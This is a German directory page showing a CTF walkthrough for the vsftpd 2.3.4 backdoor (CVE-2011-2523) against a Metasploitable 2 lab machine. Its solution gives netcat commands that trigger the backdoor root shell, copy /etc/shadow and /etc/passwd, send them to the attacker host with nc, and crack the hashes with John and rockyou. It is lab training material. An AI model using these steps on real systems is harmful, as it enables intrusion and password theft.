Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CTF---CVE-2011-2523 | Kitploit
Tools/GitHubGitHub/xiangsi-howard/ctf---cve-2011-2523
Passwort-CrackingAufklärungSchwachstellenanalyseExploitationInformationsbeschaffungCTFPenetrationstestsLernen & Bildung
GitHubxiangsi-howard/ctf---cve-2011-2523

CTF---CVE-2011-2523

Repository anzeigen
vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Szenario Capture the Flag - CVE-2011-2523

Erfasse die entschlüsselten Dateien /etc/shadow und /etc/passwd vom verwundbaren Metasploitable-2-Server.

Einrichtung der Umgebung

Schritt 1: Laden Sie eine virtuelle Maschine herunter und entpacken Sie sie

Für diese CTF verwenden wir VMware Workstation Pro mit zwei virtuellen Maschinen. Wir nutzen Kali Linux als Angreifer-Maschine und Metasploitable 2 als verwundbare Maschine.

  • Laden Sie VMware Workstation herunter und installieren Sie es: https://www.vmware.com/products/workstation-player/workstation-player-evaluation.html
  • Laden Sie die Kali-Linux-Virtual-Machine herunter und extrahieren Sie sie: https://www.kali.org/get-kali/
  • Laden Sie die Metasploitable-2-Virtual-Machine herunter und extrahieren Sie sie: https://sourceforge.net/projects/metasploitable/files/Metasploitable2/

Schritt 2: Öffnen Sie die Kali-Linux- und Metasploitable-2-Virtual-Machines in VMware aus der extrahierten Datei

  • Wählen Sie die Option Open a Virtual Machine in VMware Workstation und wählen Sie die entpackte Kali-Linux-Datei aus
  • Klicken Sie mit der rechten Maustaste auf die Seitenleiste und wählen Sie die Option open, dann wählen Sie die entpackte Metasploitable-2-Datei aus
  • Drücken Sie auf beiden virtuellen Maschinen die Schaltfläche Play virtual machine
  • Wenn Sie aufgefordert werden, die Option I moved It oder I copied It zu wählen, wählen Sie die Option I copied It

Schritt 3: Anmelden

  • Melden Sie sich bei Kali Linux mit kali als Benutzername und Passwort an
  • Melden Sie sich bei Metasploitable mit msfadmin als Benutzername und Passwort an

Schritt 4: IP-Adresse der Metasploitable-Virtual-Machine notieren

  • Führen Sie ip addr show aus und notieren Sie die IP-Adresse des Abschnitts inet

Lösung

Massachusetts Institute of Technology Research and Engineering beschreibt CVE-2011-2523 als eine allgemeine Schwachstelle, bei der vsftpd 2.3.4 downloaded between 20110630 and 20110703 contains a backdoor which opens a shell on port 6200/tcp.

Schritt 1: Suchen Sie mit dem FTP-Dienst nach offenen Ports auf der Metasploitable-Maschine

  • nmap <vulnerable-machine-ip-address>
  • Der nmap-Scan sollte einen offenen Port auf Port 21 mit dem FTP-Dienst anzeigen

Schritt 2: Versuchen Sie, sich mit NetCat mit dem offenen Port zu verbinden

  • nc <vulnerable-machine-ip-address> 21
  • Der Benutzername ist eine beliebige Zeichenkette mit :) am Ende. Geben Sie user <string>:) ein
  • Wenn Sie zur Eingabe eines Passworts aufgefordert werden, geben Sie eine beliebige Zeichenkette ein: pass <string>
  • Beenden Sie dann die Verbindung mit ^C [STRG + C]. Auf Port 6200 wurde eine Root-Shell zu Metasploitable geöffnet.

Schritt 3: Verbinden Sie sich mit der Shell auf Port 6200 der verwundbaren Maschine

  • nc -v <vulnerable-machine-ip-address> 6200
  • Zeigen Sie die IP-Adresse der aktuellen Verbindung an: ip addr show
  • Zeigen Sie mit whoami, dass Root-Zugriff gewährt wurde

Schritt 4: Kopieren Sie die Dateien /etc/shadow und /etc/passwd in eine andere Datei

  • cp /etc/shadow shadow.txt
  • cp /etc/passwd passwd.txt

Schritt 5: Senden Sie die kopierten Dateien mit NetCat an die Kali-Linux-Maschine

  • Suchen Sie auf der Angreifer-Maschine die IP-Adresse unter inet mit dem Befehl ip addr show
  • Lauschen Sie auf der Angreifer-Maschine mit nc -l -p 1234 > shadow.txt auf Dateien
  • In der Root-Shell auf Metasploitable: nc -w 3 <destination-ip> 1234 < shadow.txt
  • Wiederholen Sie den Vorgang für die passwd-Datei

Schritt 5: Formatieren Sie die Shadow-Datei in das John-Tool-Format

  • unshadow passwd.txt shadow.txt > unshadowed-input
  • Zeigen Sie die Datei mit cat unshadowed-input an; sie sollte Benutzername und Passwort enthalten

Schritt 6: Entschlüsseln Sie die Shadow-Datei mit dem Befehl John und einer Wortliste

  • Verwenden Sie die Wortliste rockyou.txt, um Hashes mit John zu knacken
  • Entpacken Sie die Wortlistendatei auf Kali Linux mit sudo gzip -d /usr/share/wordlists/rockyou.txt.gz
  • Wenn Sie zur Eingabe eines Passworts aufgefordert werden, verwenden Sie das Standard-Admin-Passwort für Kali Linux: kali
  • Entschlüsseln Sie die Passwörter mit john unshadowed-input –wordlist=/usr/share/wordlists/rockyou.txt
  • Zeigen Sie die geknackten Passwörter an: john –show unshadowed-input
Tool herunterladen